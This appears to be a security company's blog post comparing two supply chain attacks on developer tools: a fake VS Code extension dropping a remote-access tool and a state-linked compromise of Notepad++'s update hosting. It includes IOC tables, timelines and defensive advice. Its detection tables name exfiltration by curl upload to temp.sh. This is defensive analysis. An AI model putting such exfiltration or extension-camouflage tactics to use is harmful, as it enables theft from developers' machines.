DugganUSA LLC is a cybersecurity company based in Minnesota that builds AI-powered threat intelligence tools. Our platform indexes over 1 million indicators of compromise (IOCs), 400,000+ DOJ Epstein documents, and provides a free STIX 2.1 threat feed consumed by Fortune 500 companies and defense contractors.

Butterbot is DugganUSA's AI-powered security chatbot with 40+ tools for searching IOCs, correlating threat indicators, traversing threat graphs, analyzing behavioral patterns, and running CARVER risk assessments. It uses OpenAI function calling with Meilisearch-backed indexes.

What is AIPM (AI Presence Management)?

AIPM is a tool that audits how AI models (GPT, Claude, Gemini, Perplexity) perceive and recommend your brand. It calculates an AIPM-NPS score by directly querying AI models, analyzes your website structure for AI crawler readiness, and provides optimization recommendations. Think 'SEO for the LLM era.'

Is the Epstein Files search free?

Yes. The Epstein Files Search at epstein.dugganusa.com offers a free tier with 500 queries per day. It covers all 12 DOJ EFTA datasets (400K+ documents), 2M+ ICIJ offshore entities, and 2M+ federal decisions. Professional and enterprise tiers are available for researchers and journalists needing higher limits.

Who founded DugganUSA?

DugganUSA was founded by Patrick Duggan on December 1, 2025, in Minnesota. Patrick's background includes Dell EMC, Palo Alto Networks, and embedded work at Microsoft on JEDI/Azure Stack. The company's D-U-N-S number is 14-363-3562.

What is the DugganUSA STIX feed?

DugganUSA operates a free STIX 2.1 threat intelligence feed at analytics.dugganusa.com/api/v1/stix-feed. It contains 1M+ indicators of compromise including botnet C2s, malicious IPs, and attack infrastructure. The feed is TAXII 2.1 compliant and is consumed by major organizations including Microsoft, AT&T, Amazon, and defense contractors.

Supply Chain Showdown: Moltbot vs Notepad++ - Two Attacks, One Lesson

Patrick Duggan
Feb 2
6 min read

# Supply Chain Showdown: Moltbot vs Notepad++ - Two Attacks, One Lesson

**Published:** February 2, 2026

**Author:** DugganUSA Threat Intelligence

TL;DR

Two supply chain attacks hit developer tools in the past week. One was loud and fast (Moltbot fake VS Code extension). One was quiet and slow (Notepad++ hosting provider compromise by Chinese state actors). Same target: developers. Same goal: access. Completely different tradecraft. Here's what both teach us about software trust in 2026.

The Tale of Two Attacks

| Factor | Moltbot (Jan 27, 2026) | Notepad++ (June-Dec 2025) |

|--------|------------------------|---------------------------|

| **Vector** | Fake VS Code extension | Hosting provider hijack |

| **Actor** | Unknown | APT31/Violet Typhoon (China) |

| **Duration** | ~24 hours | **6 months** |

| **Targeting** | Mass (all installers) | Selective (East Asia telecom/finance) |

| **Payload** | ConnectWise ScreenConnect RAT | Custom recon + exfil |

| **Detection** | Fast (Aikido flagged it) | Slow (community user noticed) |

| **Sophistication** | Medium | High |

Attack #1: Moltbot (The Smash and Grab)

What Happened

January 27, 2026: A fake extension called "ClawdBot Agent – AI Coding Assistant" appeared on the VS Code Marketplace. It worked as advertised—a functional AI coding assistant. It also dropped ConnectWise ScreenConnect the moment VS Code launched.

How It Worked

Why It Worked

1. **Moltbot doesn't have an official extension** - attackers exploited brand recognition

2. **VS Code Marketplace vetting is weak** - extension published same day

3. **Functional camouflage** - the AI assistant actually worked

4. **Developer trust** - "It's on the official marketplace"

IOCs

| Type | Indicator |

|------|-----------|

| Extension ID | `clawdbot.clawdbot-agent` |

| Process | `ScreenConnect.ClientService` |

| File | `~/.clawdbot/*` (credential storage) |

| Publisher | "clawdbot" (impersonator) |

Outcome

Detected within 24 hours. Microsoft removed it. Moltbot issued advisory. Damage: unknown but likely limited due to fast response.

Attack #2: Notepad++ (The Long Game)

What Happened

June 2025: Chinese state actors (APT31/Violet Typhoon) compromised Notepad++'s hosting provider. For six months, they intercepted update traffic and redirected selected users to malicious servers delivering trojanized installers.

How It Worked

Why It Worked

1. **Infrastructure-level access** - no code vulnerability needed

2. **Legitimate domain** - updates came from notepad-plus-plus.org

3. **No signature verification** - pre-8.8.9 didn't validate installers

4. **Selective targeting** - only East Asia, avoided mass detection

5. **Six months of patience** - state-sponsored discipline

IOCs (Limited)

| Type | Indicator |

|------|-----------|

| File | `AutoUpdater.exe` in %TEMP% |

| File | `update.exe` in %TEMP% |

| Behavior | System enumeration commands |

| Exfil | curl upload to `temp.sh` |

| Process | `GUP.exe` spawning unexpected children |

Outcome

Discovered by community user who noticed GUP.exe behaving strangely. Notepad++ migrated hosting, added signature verification in v8.8.9. Damage: unknown, targeted organizations likely compromised for months.

The Sophistication Gap

Moltbot: Script Kiddie Tactics

- **Spray and pray**: Target everyone, hope someone installs

- **Known RAT**: ScreenConnect is well-documented

- **Fast and loud**: High visibility, fast detection

- **No persistence planning**: One-shot payload

Notepad++: State-Sponsored Tradecraft

- **Surgical targeting**: Only specific organizations in specific regions

- **Infrastructure compromise**: Attack the supply chain, not the code

- **Custom tooling**: Bespoke recon, not off-the-shelf RAT

- **Long-term access**: Six months of maintained presence

- **Clean exit**: Credentials retained even after server remediation

Detection Comparison

Moltbot Was Caught Because:

1. Aikido's automated scanning flagged network permissions

2. Extension requested capabilities inconsistent with stated purpose

3. ScreenConnect is a known RAT - signatures exist

4. Mass distribution = higher chance of hitting a researcher

Notepad++ Wasn't Caught For 6 Months Because:

1. Infrastructure attack left no code artifacts

2. Selective targeting avoided security researchers

3. Updates came from legitimate domain

4. Custom tooling had no existing signatures

5. Patience - low and slow avoids anomaly detection

What Developers Should Learn

Trust Nothing

| Old Assumption | New Reality |

|----------------|-------------|

| "It's on the official marketplace" | Marketplaces don't vet thoroughly |

| "It's from the official domain" | Domains can be hijacked at hosting level |

| "I use automatic updates" | Updates can be poisoned |

| "I'd notice malware" | Good malware works while you work |

Defense Layers

**For Extension-Based Attacks (Moltbot-style):**

- Verify publisher identity before installing

- Check extension permissions vs. stated functionality

- Use allowlists for approved extensions

- Monitor for unexpected processes

**For Infrastructure Attacks (Notepad++-style):**

- Verify signatures on all updates (Notepad++ v8.8.9+)

- Use package managers with cryptographic verification

- Monitor for unexpected network connections from trusted apps

- Watch for enumeration commands from update processes

The Bigger Picture

These attacks represent two ends of the supply chain spectrum:

**Moltbot** = Opportunistic, fast, loud, easy to catch

**Notepad++** = Targeted, slow, quiet, hard to catch

Both succeeded initially because developers trust their tools.

The Moltbot attacker wanted quick access to many machines. The APT31 operators wanted deep access to specific machines. Both got what they wanted, at least temporarily.

Our Detection Posture

Pattern 43: Supply Chain via Developer Tools

We track both attack patterns:

| Control | Moltbot-style | Notepad++-style |

|---------|---------------|-----------------|

| Extension vetting | Allowlist-only | N/A |

| Update verification | N/A | Signature required |

| Process monitoring | ScreenConnect detection | Unexpected child processes |

| Network monitoring | RAT C2 patterns | Exfil to temp.sh/similar |

| Credential protection | No cleartext storage | Key Vault integration |

Why We Use Claude Code

|------|-------------|---------|-----------|

Timeline Comparison

Moltbot

| Date | Event |

|------|-------|

| Jan 27, 2026 | Malicious extension published |

| Jan 27, 2026 | Aikido detection |

| Jan 28, 2026 | Microsoft removes extension |

| Jan 28, 2026 | Public disclosure |

**Total exposure: ~24 hours**

Notepad++

| Date | Event |

|------|-------|

| June 2025 | Hosting provider compromised |

| June-Sept 2025 | Active server access |

| Sept 2, 2025 | Server access lost (kernel update) |

| Sept-Dec 2025 | Credential-based access continues |

| Nov 2025 | Community user notices anomaly |

| Nov 18, 2025 | v8.8.8 restricts update sources |

| Dec 2, 2025 | Credential access terminated |

| Dec 9, 2025 | v8.8.9 adds signature verification |

| Feb 2, 2026 | Full public disclosure |

**Total exposure: ~6 months**

Key Takeaways

1. **Supply chain attacks are the new normal** - two major attacks in one week

2. **Sophistication varies wildly** - from script kiddie to state-sponsored

3. **Detection time matters** - 24 hours vs 6 months

4. **Signature verification is table stakes** - Notepad++ learned this the hard way

5. **Developer tools are high-value targets** - access to devs = access to everything they build

6. **Trust must be verified** - official marketplace ≠ safe, official domain ≠ safe

Recommendations

For Individual Developers

- [ ] Update Notepad++ to v8.8.9+

- [ ] Audit VS Code extensions against allowlist

- [ ] Enable extension auto-update verification where available

- [ ] Monitor for unexpected processes from dev tools

- [ ] Don't store credentials in cleartext

For Organizations

- [ ] Implement extension allowlists

- [ ] Require signed updates for all developer tools

- [ ] Monitor developer workstations for RAT indicators

- [ ] Include supply chain in threat modeling

- [ ] Assume your developers are targeted

Platform Stats

| Metric | Value |

|--------|-------|

| IOCs Tracked | 272,310 |

| Automated Decisions | 294,716 |

| Supply Chain Patterns | 43+ documented |

| Developer Tool Attacks (2026) | 2 major (so far) |

*This analysis was performed using the DugganUSA Threat Intelligence Platform. We track supply chain attacks because developers are the keys to the kingdom.*

**Sources:**

- [The Hacker News - Notepad++ Supply Chain](https://thehackernews.com/2026/02/notepad-official-update-mechanism.html)

- [Help Net Security - Notepad++ Compromise](https://www.helpnetsecurity.com/2026/02/02/2025-notepad-supply-chain-compromise/)

- [The Hacker News - Moltbot VS Code](https://thehackernews.com/2026/01/fake-moltbot-ai-coding-assistant-on-vs.html)

- [Aikido - Clawdbot Extension Analysis](https://www.aikido.dev/blog/fake-clawdbot-vscode-extension-malware)

- [Hackread - Notepad++ Hosting Breach](https://hackread.com/notepad-updates-malware-hosting-breach/)

*Her name was Renee Nicole Good.*

*His name was Alex Jeffery Pretti.*

Supply Chain Showdown: Moltbot vs Notepad++ - Two Attacks, One Lesson

TL;DR

The Tale of Two Attacks

Attack #1: Moltbot (The Smash and Grab)

What Happened

How It Worked

Why It Worked

IOCs

Outcome

Attack #2: Notepad++ (The Long Game)

What Happened

How It Worked

Why It Worked

IOCs (Limited)

Outcome

The Sophistication Gap

Moltbot: Script Kiddie Tactics

Notepad++: State-Sponsored Tradecraft

Detection Comparison

Moltbot Was Caught Because:

Notepad++ Wasn't Caught For 6 Months Because:

What Developers Should Learn

Trust Nothing

Defense Layers

The Bigger Picture

Our Detection Posture

Pattern 43: Supply Chain via Developer Tools

Why We Use Claude Code

Timeline Comparison

Moltbot

Notepad++

Key Takeaways

Recommendations

For Individual Developers

For Organizations

Platform Stats

Recent Posts

Comments